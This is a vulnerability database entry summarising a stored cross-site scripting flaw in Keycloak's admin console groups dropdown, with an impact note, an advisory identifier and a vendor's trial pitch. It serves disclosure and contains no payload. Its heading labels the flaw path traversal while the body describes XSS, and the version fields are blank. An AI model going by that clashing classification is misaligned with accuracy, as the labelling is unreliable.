logo

Database

Lack of data validation - Path Traversal In org.keycloak:keycloak-core

Description

Stored Cross-Site Scripting (XSS) in Keycloak via groups dropdown

Summary

A Stored XSS vulnerability was reported in the Keycloak Security mailing list, affecting all the versions of Keycloak, including the latest release (16.0.1). The vulnerability allows a privileged attacker to execute malicious scripts in the admin console, abusing of the groups' dropdown functionality.

Impact

Successful attacks of this vulnerability can result a privileged attacker to load a XSS script, and steal data from other users. The impact can be considered moderate to low, considering privileged credentials are required.

References

    Please refer to the Keycloak Security mailing list for more information.

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem
Package
Affected version
Patched versions

Aliases

1. GHSA-755v-r4x4-qf7m2. GCVE-GHSA-755v-r4x4-qf7m

References

1. https://github.com/keycloak/keycloak/security/advisories/GHSA-755v-r4x4-qf7m

Does your application use this vulnerable software?

During the free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.